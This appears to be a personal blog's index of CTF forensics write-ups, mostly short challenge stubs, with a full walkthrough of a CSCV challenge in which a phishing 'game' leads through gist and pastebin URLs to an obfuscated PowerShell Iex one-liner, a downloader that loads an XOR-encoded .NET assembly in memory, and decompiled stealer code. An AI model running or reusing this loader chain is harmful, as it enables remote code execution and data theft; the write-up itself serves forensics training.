Library of Devoruina

UTCTF

Tue, 17 Mar 2026 20:13:41 +0700

Overview

All of these challenges are parts of a single forensics case, of which the same KAPE triage artifact is given.
Tools used:
- FTK Imager.
- SQLite Browser.
- MFTECmd.
- MFTExplorer.
- Timeline Explorer
- PECmd.
- RegRipper.
- Windows Event Viewer.

Pre-analysis

We first start by parsing the Master File Table ($MFT) as it writes a records of all data that was created and modified on the system, which can aid us a lot in our analysis process.
The tool we will be using for this is MFTECmd.exe

PLAINTEXT

$ MFTECmd.exe -f '.\$J' -m '$MFT' --csv ".\" --csvf MFT.csv

This outputs MFT.csv, which we can then view with Timeline Explorer.

Landfall

Description

Hello operator, in the .zip file is a triage of the desktop breached by the threat actors. It seems like they were able to physically login, so we think there’s an insider threat amongst the employees.

VSL CTF

Mon, 26 Jan 2026 07:34:46 +0700

The Joy Of Nostalgia

Description

A data leak is suspected to stem from poor configuration management on a WebOS workstation. The engineer in charge reported executing a Registry Wipe procedure to sanitize sensitive data related to ticket SEC-2024-1837.

Wiredive

Wed, 17 Dec 2025 18:47:16 +0700

“WireDive is a combo traffic analysis exercise that contains various traces to help you understand how different protocols look on the wire where you can evaluate your DFIR skills against an artifact you usually encounter in today’s case investigations as a security blue team member.”

DHCP

Question 1

“What IP address is requested by the client?”

By filtering out DHCP traffic, we can find the IP address requests.

Answer: 192.168.2.244

Question 2

“What is the transaction ID for the DHCP release?”

Hawkeye

Wed, 17 Dec 2025 14:16:51 +0700

“An accountant at your organization received an email regarding an invoice with a download link. Suspicious network traffic was observed shortly after opening the email. As a SOC analyst, investigate the network trace and analyze exfiltration attempts.”

Question 1

“How many packets does the capture have?”

BlueSky Ransomware

Tue, 16 Dec 2025 16:25:04 +0700

“A high-profile corporation that manages critical data and services across diverse industries has reported a significant security incident. Recently, their network has been impacted by a suspected ransomware attack. Key files have been encrypted, causing disruptions and raising concerns about potential data compromise. Early signs point to the involvement of a sophisticated threat actor. Your task is to analyze the evidence provided to uncover the attacker’s methods, assess the extent of the breach, and aid in containing the threat to restore the network’s integrity.”

Question 1

“Knowing the source IP of the attack allows security teams to respond to potential threats quickly. Can you identify the source IP responsible for potential port scanning activity?”

Acoustic

Fri, 12 Dec 2025 08:52:04 +0700

“This lab takes you into the world of voice communications on the internet. VoIP is becoming the de-facto standard for voice communication. As this technology becomes more common, malicious parties have more opportunities and stronger motives to control these systems to conduct nefarious activities. This challenge was designed to examine and explore some of the attributes of the SIP and RTP protocols. "

Lab Files:

HoneyBOT

Fri, 12 Dec 2025 08:52:04 +0700

A PCAP analysis exercise highlighting attacker’s interactions with honeypots and how automatic exploitation works.. (Note that the IP address of the victim has been changed to hide the true location.)

As a SOC analyst, analyze the artifacts and answer the questions.

Question 1

What is the attacker’s IP address?

Packet Maze

Fri, 12 Dec 2025 08:52:04 +0700

A company’s internal server has been flagged for unusual network activity, with multiple outbound connections to an unknown external IP. Initial analysis suggests possible data exfiltration. Investigate the provided network logs to determine the source and method of compromise.

Question 1

What is the FTP password?

PsExec Hunt

Fri, 12 Dec 2025 08:52:04 +0700

An alert from the Intrusion Detection System (IDS) flagged suspicious lateral movement activity involving PsExec. This indicates potential unauthorized access and movement across the network. As a SOC Analyst, your task is to investigate the provided PCAP file to trace the attacker’s activities. Identify their entry point, the machines targeted, the extent of the breach, and any critical indicators that reveal their tactics and objectives within the compromised environment.

WannaGame Championship 2025

Tue, 09 Dec 2025 14:06:48 +0700

PLAINTEXT

 __ __ ____ _________ .__ .__ .__ .__ ._.
/ \ / \/_ | \_ ___ \| |__ _____ _____ ______ |__| ____ ____ _____| |__ |__|_____ | |
\ \/\/ / | | / \ \/| | \\__ \ / \\____ \| |/ _ \ / \ / ___/ | \| \____ \ | |
 \ / | | \ \___| Y \/ __ \| Y Y \ |_> > ( <_> ) | \\___ \| Y \ | |_> > \|
 \__/\ / |___| \______ /___| (____ /__|_| / __/|__|\____/|___| /____ >___| /__| __/ __
 \/ \/ \/ \/ \/|__| \/ \/ \/ |__| \/

Hide and Seek

“I just searched and downloaded some files, but I found some suspicious process created. Please help me find out.”

Category: Forensics.

CSCV Finals 2025

Thu, 27 Nov 2025 14:40:00 +0700

Introduction

Huge thank to @tr4c3datr4il for giving me the opportunity to solve these challenges despite me not participating in the contest.

Case Charlie

PTITHCM Mini Forensics

Wed, 12 Nov 2025 14:06:48 +0700

Sweet Secret

We are given a .docx file, reading it gives us nothing. So we are going to extract it.

$ unzip 'Welcome.docx'

Then we are given an AES Ciphertext in docProps/secret.txt

$ cat 'docProps/secret.txt'
AES-data: 3d0d1fe78d2d8648ac15b5f51ad906fae58b54b89e680b8130188efc326392acb000b9956628c014f0dc9916aa9eef56

Inside word/document.xml, we can find the Key and IV

XML

<w:t>Key=make_pis_great_againnnnn,IV=123456789abcdefg</w:t><

Decrypting with CyberChef gives us the flag.

Note

You can use this link to get the results.

CSCV Qualification 2025

Sat, 25 Oct 2025 06:48:00 +0700

NostalgiaS

We are given an .ad1 image.
Mount it, navigate into Users/kadoya/AppData/Local/Microsoft/Outlook/, we can read the emails that were sent to Mr. Kadoya.
Inside one of them reads:

PLAINTEXT

Hi player,

I’m sharing something special with you today — a piece of childhood we all loved: the game Moly.

Moly tells the touching story of a red-nosed mole and its friend Dau Dau. Together, they escape a burning forest and rebuild their lives in a peaceful snowy land — growing crops, raising animals, and building a new home filled with warmth and friendship.

For many of us, Moly wasn’t just a game. It was a memory — quiet evenings, simple adventures, and that gentle happiness only old games can bring.

You can find the game file attached. Password: playmoly2025.

 Run game by click "playmoly".

I hope you’ll take a moment to revisit this little world — and relive the feeling of those days again.

Enjoy your journey,

ACE

Team Moly

Which tells us that Mr.Kadoya ran a hidden malware inside playmoly.
By extracting the archive from the mailbox, we unzip the file with the password: playmoly2025
Inside the file is a script that contains a peculiar line:

JAVASCRIPT

var remoteHtaUrl = 'https://gist.githubusercontent.com/oumazio/ad5626973af6118062ae401c1e788464/raw/725302cda73d10e260e2ed0f26d935e576d3bc1c/FlashInstaller.hta';

By accessing the link, we are met with yet another file, this time containing the so-called “game code”. Upon further inspection, the file connects to another Github GIST

JAVASCRIPT

var logo = "https://gist.githubusercontent.com/oumazio/d2b2cbbe1ad51fd956815e78e6bfe31d/raw/2e34af3f8aac3392f07a1d59013cc8897dda8f3a/something.txt";

Accessing the link hands us yet another script, this time heavily obfuscated. Upon even further inspection, the script downloads another script.

BASH

$ grep 'https' something.txt
https://gist.githubusercontent.com/oumazio/fdd0b2711ab501b30b53039fa32bc9ca/raw/ca4f9da41c5c64b3b43f4b0416f8ee0d0e400803/secr3t.txt

Inside is yet another obfuscated script.

POWERSH

Iex(neW-obJecT iO.cOMPrESsion.DeflaTEStreAM([iO.meMORysTrEAM] [convErt]::FroMbase64sTrInG('hVNhb9owEP2OxH+wUCSCIIZO06Qy7QNt1a1rxyZg6ybEJic5iFfHzhxTiLr+953BlKSgNV+i3N17797lzhvkOaShKL5qQd6RRmJMlve73YzlBkIuaaTSrmar7mnvD/wYfxg06jXvu9LXUGB5b/3qNX5PigyGLAVLMDbABOiPTDKOYA10xGPQ1zy6s9BPYBIV74pHS4nBes3ogjzUawQf7xbCc8FBGiwYwir4HP6GyJBxgQ2ldAiGPlU4BMhIxRCfK2m2sD0HvVArKRSLx0ZzufC9kt3Wc0F6wfNM5eC7jMsnsP7GxBJyy1zVohPNU79FgjwT3JBmp0n+ktsENOzafiDeLxKkzEQJaf7srae94HQQXLJgPmt7TfJYUXLkZ4XZiJXchxiazkq90BuQC5NsgXOlie9x+0PeEnwHwhyW2ky73drN+UBw6vEZMkzR2j1oM+v3J8om/D2TLXGWO+TkjRtT1YPSfMElE/8xUVZ92ceR6mNWKrrOy6G/IFyjhlvgY+0ztx92Em7lRjAX2D5Xku62B4dzg0vlV1Ura8PnaOXpMAIJpNEgAZMxKd/ANl51YphegLFQa2HXEH2/je1JWyVMuqG8knNlMXsGi9rK+SXZzjFvZ1zGeCKXgi1y9Dc2zPAIB4bzern6yzIUPDreEb2S9+oOG5dLITpk83q+Oo8k2pyImwOs8ZpOMPwP' ) ,[SYSTeM.io.comPRESsion.COmPRessiONmODe]::DECompResS) |FOReach-oBJeCt{ neW-obJecT SyStEM.Io.STreAmREaDeR( $_,[TEXT.EncOdiNG]::ascIi ) }| FOreacH-objeCT{$_.rEAdToeND( ) })

The script is compressed with zlib and encoded with base64, we can decrypt it with:

PYTHON

 $ sh -c -- "python3 - << 'PY'
 import base64, zlib, pathlib, sys
 b64 = pathlib.Path('script.txt').read_text().strip()
 data = base64.b64decode(b64)
 text = zlib.decompress(data, -zlib.MAX_WBITS).decode('ascii', errors='replace')
 pathlib.Path('decoded.txt').write_text(text)
 PY"

The decoded file reads:

JAVA

$AssemblyUrl = "https://pastebin.com/raw/90qeYSHA"
$XorKey = 0x24
$TypeName = "StealerJanai.core.RiderKick"
$MethodName = "Run"

try {
 $WebClient = New-Object System.Net.WebClient
 $encodedContent = $WebClient.DownloadString($AssemblyUrl)
 $WebClient.Dispose()

 $hexValues = $encodedContent.Trim() -split ',' | Where-Object { $_ -match '^0x[0-9A-Fa-f]+$' }

 $encodedBytes = New-Object byte[] $hexValues.Length
 for ($i = 0; $i -lt $hexValues.Length; $i++) {
 $encodedBytes[$i] = [Convert]::ToByte($hexValues[$i].Trim(), 16)
 }

 $originalBytes = New-Object byte[] $encodedBytes.Length
 for ($i = 0; $i -lt $encodedBytes.Length; $i++) {
 $originalBytes[$i] = $encodedBytes[$i] -bxor $XorKey
 }

 $assembly = [System.Reflection.Assembly]::Load($originalBytes)

 if ($TypeName -ne "" -and $MethodName -ne "") {
 $targetType = $assembly.GetType($TypeName)
 $methodInfo = $targetType.GetMethod($MethodName, [System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::Public)
 $methodInfo.Invoke($null, $null)
 }

} catch {
 exit 1
}

We are met with yet another script downloader, this time the script is obfuscated with XOR.

JAVA

$AssemblyUrl = "https://pastebin.com/raw/90qeYSHA"
$XorKey = 0x24

After decoding, the script gives us a .NET binary, which we have to reverse engineer. The script seems to be an information collect, which have a component named StealerJanai.component.systeminfo.SystemSecretInformationCollector.cs, which reads:

CSHARP

// StealerJanai, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// StealerJanai.component.systeminfo.SystemSecretInformationCollector
using System;
using System.Collections.Generic;
using System.Text;
using Microsoft.Win32;

public class SystemSecretInformationCollector
{
	private const string MagicChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

	public string Collect()
	{
		StringBuilder stringBuilder = new StringBuilder();
		try
		{
			string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83");
			string machineName = Environment.MachineName;
			string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN");
			string registryValue = GetRegistryValue();
			string value = text + machineName + "_" + text2 + registryValue + "}";
			stringBuilder.Append(value);
		}
		catch (Exception ex)
		{
			stringBuilder.AppendLine($"Error: {ex.Message}");
		}
		return stringBuilder.ToString();
	}

	private string DecodeMagicToString(string input)
	{
		try
		{
			if (string.IsNullOrEmpty(input))
			{
				return string.Empty;
			}
			List<byte> list = new List<byte>();
			foreach (char value in input)
			{
				int num = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".IndexOf(value);
				if (num < 0)
				{
					return "Invalid character";
				}
				int num2 = num;
				for (int num3 = list.Count - 1; num3 >= 0; num3--)
				{
					int num4 = list[num3] * 62 + num2;
					list[num3] = (byte)(num4 % 256);
					num2 = num4 / 256;
				}
				while (num2 > 0)
				{
					list.Insert(0, (byte)(num2 % 256));
					num2 /= 256;
				}
			}
			int j;
			for (j = 0; j < list.Count && list[j] == 0; j++)
			{
			}
			if (j >= list.Count)
			{
				return string.Empty;
			}
			byte[] array = new byte[list.Count - j];
			for (int k = 0; k < array.Length; k++)
			{
				array[k] = list[j + k];
			}
			return Encoding.ASCII.GetString(array);
		}
		catch (Exception ex)
		{
			return "Decode error: " + ex.Message;
		}
	}

	private string GetRegistryValue()
	{
		try
		{
			using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n"))
			{
				if (registryKey != null)
				{
					object value = registryKey.GetValue("");
					if (value != null)
					{
						return value.ToString();
					}
				}
			}
			return "Registry key not found";
		}
		catch (Exception ex)
		{
			return "Registry error: " + ex.Message;
		}
	}
}

// StealerJanai, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // StealerJanai.component.systeminfo.SystemSecretInformationCollector using System; using System.Collections.Generic; using System.Text; using Microsoft.Win32; public class SystemSecretInformationCollector { private const string MagicChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; public string Collect() { StringBuilder stringBuilder = new StringBuilder(); try { string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83"); string machineName = Environment.MachineName; string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN"); string registryValue = GetRegistryValue(); string value = text + machineName + "_" + text2 + registryValue + "}"; stringBuilder.Append(value); } catch (Exception ex) { stringBuilder.AppendLine($"Error: {ex.Message}"); } return stringBuilder.ToString(); } private string DecodeMagicToString(string input) { try { if (string.IsNullOrEmpty(input)) { return string.Empty; } List<byte> list = new List<byte>(); foreach (char value in input) { int num = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".IndexOf(value); if (num < 0) { return "Invalid character"; } int num2 = num; for (int num3 = list.Count - 1; num3 >= 0; num3--) { int num4 = list[num3] * 62 + num2; list[num3] = (byte)(num4 % 256); num2 = num4 / 256; } while (num2 > 0) { list.Insert(0, (byte)(num2 % 256)); num2 /= 256; } } int j; for (j = 0; j < list.Count && list[j] == 0; j++) { } if (j >= list.Count) { return string.Empty; } byte[] array = new byte[list.Count - j]; for (int k = 0; k < array.Length; k++) { array[k] = list[j + k]; } return Encoding.ASCII.GetString(array); } catch (Exception ex) { return "Decode error: " + ex.Message; } } private string GetRegistryValue() { try { using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n")) { if (registryKey != null) { object value = registryKey.GetValue(""); if (value != null) { return value.ToString(); } } } return "Registry key not found"; } catch (Exception ex) { return "Registry error: " + ex.Message; } } }

From this clue:

CSHARP

string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83");
string machineName = Environment.MachineName;
string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN");
string registryValue = GetRegistryValue();
string value = text + machineName + "_" + text2 + registryValue + "}";

The flag format seems to be <text1_decoded>_<machineName>_<text2_decoded><registryValue>}
Decoding the text with script gives us:
- text1: CSCV2025{your_computer_
- text2: has_be3n_kicked_by
Which gives us: CSCV2025{your_computer_<machineName>_has_be3n_kicked_by<registryValue>}
To find the machine name, we can read the logs.

BASH

$ evtx_dump 'Windows/System32/winevt/Logs/Application.evtx' | grep '<Computer>'
<Computer>DESKTOP-47ICHL6</Computer>

Which gives us: DESKTOP-47ICHL6
Finally, we need to get the registry value.

CSHARP

using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n"))

The registry is under SOFTWARE\\hensh1n, which we can read with hivex

BASH

$ hivexget 'Users/kadoyat/NTUSER.DAT' 'SOFTWARE\\hensh1n'
"@"="HxrYJgdu"

Which gives us HxrYJgdu, combining all of them gives us the flag.

Flag: CSCV2025{your_computer_DESKTOP-47ICHL6_has_be3n_kicked_byHxrYJgdu}

WannaGame Freshmen 2025

Sun, 12 Oct 2025 12:20:16 +0700

CatWithASteg

We are given a file named hiden.jpg, which is an invalid .jpg file.
Reading the file’s header, we are met with:

BASH

$ hexdump -C hiden.jpg | head
00000000 01 23 45 67 89 01 23 45 67 89 01 23 45 67 89 01 |.#Eg..#Eg..#Eg..|
00000010 23 45 67 89 aa aa aa aa ff 8d ff 0e 00 10 4a 46 |#Eg...........JF|
00000020 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 00 be |IF.....`.`......|
00000030 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 |Exif..MM.*......|
00000040 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 |................|
00000050 00 00 00 01 00 00 00 56 01 1b 00 05 00 00 00 01 |.......V........|
00000060 00 00 00 5e 01 28 00 03 00 00 00 01 00 02 00 00 |...^.(..........|
00000070 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 |.............i..|
00000080 00 00 00 01 00 00 00 66 00 00 00 00 00 00 00 60 |.......f.......`|
00000090 00 00 00 01 00 00 00 60 00 00 00 01 00 06 90 00 |.......`........|

We can see garbage date from line 0 to 10, from 01 to aa. To fix this, we need to extract the image by writing this file to another file, but skipping the first 24 bytes.

$ dd if=hiden.jpg of=fixed.jpg bs=1 skip=24
5857+1 records in
5857+1 records out
140589 bytes (141 kB, 137 KiB) copied, 0.000000000001 s, 9999.99 TB/s

However, it’s still not a valid image because byte at 02 and 04 are wrong. Using tools like dhex, we fix the two bytes 8d and 0e into d8 and e0, the resulting image is:

Flag: W1{Y0u_4r3_v3ry_g00d_m3ow!}